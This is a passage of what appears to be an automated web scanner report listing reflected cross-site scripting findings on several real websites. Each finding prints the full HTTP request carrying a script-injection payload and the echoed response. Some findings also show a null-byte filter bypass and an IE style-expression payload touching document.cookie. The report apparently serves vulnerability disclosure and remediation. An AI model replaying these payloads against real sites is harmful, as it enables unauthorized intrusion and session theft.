The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 633c8"><script>alert(1)</script>21ff8f9967b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/news/-/-/3.html?633c8"><script>alert(1)</script>21ff8f9967b=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:32:01 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/Chinese%2Bair%2Bforce%2Bdrill%2Blooks%2Bawfully%2Bsimilar%2Bto%2B%25E2%2580%2598Top%2BGun%25E2%2580%2599.html?633c8"><script>alert(1)</script>21ff8f9967b=1" title="Search discussions for item &quot;Chinese air force drill looks awfully similar to ...Top Gun...&quot;">
...[SNIP]...

3.47. http://boardreader.com/pop/releases/-/-/3.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/releases/-/-/3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccc3d"><script>alert(1)</script>263690e9a78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/releases/-/-/3.html?ccc3d"><script>alert(1)</script>263690e9a78=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:58 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/Hyundai%2BMotor%2BAmerica%2BReports%2BRecord%2BJanuary%2BSales%2B--%2BFOUNTAIN%2BVALLEY%252C%2BCalif.%252C%2BFeb.%2B1%252C%2B2011%2B%252FPRNewswire%252F%2B--.html?ccc3d"><script>alert(1)</script>263690e9a78=1" title="Search discussions for item &quot;Hyundai Motor America Reports Record January Sales -- FOUNTAIN VALLEY, Calif., Feb. 1, 2011 /PRNewswire/ --&quot;">
...[SNIP]...

3.48. http://boardreader.com/pop/sites.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/sites.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c1aa'><script>alert(1)</script>341d035808d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/sites.html?9c1aa'><script>alert(1)</script>341d035808d=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:56 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href='/pop/sites.html?9c1aa'><script>alert(1)</script>341d035808d=1&o=10'>
...[SNIP]...

3.49. http://boardreader.com/pop/videos/-/-/3.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/videos/-/-/3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2008f"><script>alert(1)</script>ade1aee3939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/videos/-/-/3.html?2008f"><script>alert(1)</script>ade1aee3939=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:32:03 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/Today%2BShow%2BJanuary%2B1994...What%2Bis%2Bthe%2BInternet%253F%253F.html?2008f"><script>alert(1)</script>ade1aee3939=1" title="Search discussions for item &quot;Today Show January 1994...What is the Internet??&quot;">
...[SNIP]...

3.50. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload f1c31<script>alert(1)</script>9c812db7f39 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAADnAS0wE~,ddeyF9dBubzZEABHXI8Tafb593RYf5ad HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=486&height=322&flashID=myExperience700903960001&bgcolor=%23FFFFFF&playerID=64829845001&playerKey=AQ~~%2CAAAADnAS0wE~%2CddeyF9dBubzZEABHXI8Tafb593RYf5ad&isVid=true&dynamicStreaming=true&%40videoPlayer=700903960001&autoStart=
content-type: application/x-amf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 538

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q7a72a24e428a8cdcd38fc9490194c3afa5313cc1
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 19:45:14 GMT
Server:
Content-Length: 4103

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
,.%.....eAQ~~,AAAADnAS0wE~,ddeyF9dBubzZEABHXI8Tafb593RYf5ad.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId    type.mediaDTO
.Bdf$5. ....ivideoPlayerf1c31<script>alert(1)</script>9c812db7f39.........
.SOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...

3.51. http://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [rdid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cbi.boldchat.com
Path:   /aid/3760177095415339810/bc.cbhs

Issue detail

The value of the rdid request parameter is copied into the HTML document as plain text between tags. The payload 91ccd<script>alert(1)</script>82e43485041 was submitted in the rdid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aid/3760177095415339810/bc.cbhs?wdid=798708614246318013&rdid=120108381222096822891ccd<script>alert(1)</script>82e43485041 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cbi.boldchat.com

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Date: Thu, 03 Feb 2011 19:19:51 GMT
Content-Length: 142

/* An error has occured: java.lang.NumberFormatException: For input string: "120108381222096822891ccd<script>alert(1)</script>82e43485041" */

3.52. http://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [wdid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cbi.boldchat.com
Path:   /aid/3760177095415339810/bc.cbhs

Issue detail

The value of the wdid request parameter is copied into the HTML document as plain text between tags. The payload 26709<script>alert(1)</script>40fb537d3b1 was submitted in the wdid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aid/3760177095415339810/bc.cbhs?wdid=79870861424631801326709<script>alert(1)</script>40fb537d3b1&rdid=1201083812220968228 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cbi.boldchat.com

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Date: Thu, 03 Feb 2011 19:19:50 GMT
Content-Length: 141

/* An error has occured: java.lang.NumberFormatException: For input string: "79870861424631801326709<script>alert(1)</script>40fb537d3b1" */

3.53. https://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [rdid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cbi.boldchat.com
Path:   /aid/3760177095415339810/bc.cbhs

Issue detail

The value of the rdid request parameter is copied into the HTML document as plain text between tags. The payload 5634a<script>alert(1)</script>fed7ed4bbdf was submitted in the rdid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aid/3760177095415339810/bc.cbhs?wdid=798708614246318013&rdid=1201083812220968228"%3E%3C/script%3E5634a<script>alert(1)</script>fed7ed4bbdf HTTP/1.1
Host: cbi.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset="UTF-8"
Date: Thu, 03 Feb 2011 19:47:51 GMT
Content-Length: 153

/* An error has occured: java.lang.NumberFormatException: For input string: "1201083812220968228"></script>5634a<script>alert(1)</script>fed7ed4bbdf" */

3.54. https://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [wdid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cbi.boldchat.com
Path:   /aid/3760177095415339810/bc.cbhs

Issue detail

The value of the wdid request parameter is copied into the HTML document as plain text between tags. The payload fe98c<script>alert(1)</script>3b948965da2 was submitted in the wdid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aid/3760177095415339810/bc.cbhs?wdid=798708614246318013fe98c<script>alert(1)</script>3b948965da2&rdid=1201083812220968228"%3E%3C/script%3E HTTP/1.1
Host: cbi.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset="UTF-8"
Date: Thu, 03 Feb 2011 19:47:48 GMT
Content-Length: 141

/* An error has occured: java.lang.NumberFormatException: For input string: "798708614246318013fe98c<script>alert(1)</script>3b948965da2" */

3.55. http://clicktoverify.truste.com/pvr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the name of an HTML tag attribute. The payload e483d%20style%3dx%3aexpression(alert(1))%207543349c09e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e483d style=x:expression(alert(1)) 7543349c09e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /pvr.php?page=validate&url=www.supermedia.com&sealid=101bb24b%20style%3dx%3aexpression(alert(document.cookie))%2038cf935/e483d%20style%3dx%3aexpression(alert(1))%207543349c09e101b HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: clicktoverify.truste.com
Cookie: __utma=165058976.885858271.1296786644.1296786644.1296786644.1; __utmb=165058976.1.10.1296786644; __utmc=165058976; __utmz=165058976.1296786644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/28

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:56:28 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 8431


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certification by TRUSTe</title>
<meta nam
...[SNIP]...
<input
           type='hidden' name='sealid' value=101bb24b style=x:expression(alert(document.cookie)) 38cf935/e483d style=x:expression(alert(1)) 7543349c09e101b>
...[SNIP]...

3.56. http://clicktoverify.truste.com/pvr.php [sealid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The value of the sealid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload bb24b%20style%3dx%3aexpression(alert(1))%2038cf935101b was submitted in the sealid parameter. This input was echoed as bb24b style=x:expression(alert(1)) 38cf935101b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /pvr.php?page=validate&url=www.supermedia.com&sealid=101bb24b%20style%3dx%3aexpression(alert(1))%2038cf935101b HTTP/1.1
Host: clicktoverify.truste.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:18 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8370


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certification by TRUSTe</title>
<meta nam
...[SNIP]...
<input
           type='hidden' name='sealid' value=101bb24b style=x:expression(alert(1)) 38cf935101b>
...[SNIP]...

3.57. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c6e63"><script>alert(1)</script>ac88b9e9cb was submitted in the REST URL parameter 1. This input was echoed as c6e63"><script>alert(1)</script>ac88b9e9cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00c6e63"><script>alert(1)</script>ac88b9e9cb/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:50:16 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1785
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00c6e63"><script>alert(1)</script>ac88b9e9cb/2006/">
...[SNIP]...

3.58. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00f1926<a>d08f4d1b1f6 was submitted in the REST URL parameter 1. This input was echoed as f1926<a>d08f4d1b1f6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00f1926<a>d08f4d1b1f6/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:50:17 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1643
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>d08f4d1b1f6/">weblog%00f1926<a>d08f4d1b1f6</a>
...[SNIP]...

3.59. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 98ff3<a>94fdf96a678 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/03/base98ff3<a>94fdf96a678/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:50:54 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Thu, 03 Feb 2011 19:50:55 GMT
Last-Modified: Thu, 03 Feb 2011 19:50:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1351
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/base98ff3<a>94fdf96a678/</h1>
...[SNIP]...

3.60. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae08"><script>alert(1)</script>c1a45a5709b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fae08\"><script>alert(1)</script>c1a45a5709b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/03/base/?fae08"><script>alert(1)</script>c1a45a5709b=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:49:28 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=66>; rel=shortlink
Expires: Thu, 03 Feb 2011 19:49:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 176151

<!doctype html>
<html>
<head>
<title>Dean Edwards: A Base Class for JavaScript Inheritance</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="styleshe
...[SNIP]...
<form class="contact" action="/weblog/2006/03/base/?fae08\"><script>alert(1)</script>c1a45a5709b=1#preview" method="post">
...[SNIP]...

3.61. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a084d"><script>alert(1)</script>ceea5e5408a was submitted in the REST URL parameter 1. This input was echoed as a084d"><script>alert(1)</script>ceea5e5408a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00a084d"><script>alert(1)</script>ceea5e5408a HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:35:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Fri, 04-Feb-2011 19:35:53 GMT; path=/; domain=digg.com
Set-Cookie: d=f2535ea97972169fa95cf5518bcd78dcc3e70bcad57c10fe678aafc2267b22c0; expires=Wed, 03-Feb-2021 05:43:33 GMT; path=/; domain=.digg.com
X-Digg-Time: D=323639 10.2.128.32
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15618

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00a084d"><script>alert(1)</script>ceea5e5408a.rss">
...[SNIP]...

3.62. http://ds.addthis.com/red/psi/sites/www.ip-adress.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.ip-adress.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 373f2<script>alert(1)</script>e896c8e12b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.ip-adress.com/p.json?callback=_ate.ad.hpr373f2<script>alert(1)</script>e896c8e12b&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ip-adress.com%2Fwhois%2Fsmartdevil.com44a08'%253b28a34fbd60c%2Fx22&ref=http%3A%2F%2Fburp%2Fshow%2F36&1l3wvz8 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296751058.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 326
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 04 Feb 2011 17:55:25 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 06 Mar 2011 17:55:25 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296842125.60|1296659685.66; Domain=.addthis.com; Expires=Sun, 03-Feb-2013 13:54:01 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 04 Feb 2011 17:55:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 04 Feb 2011 17:55:25 GMT
Connection: close

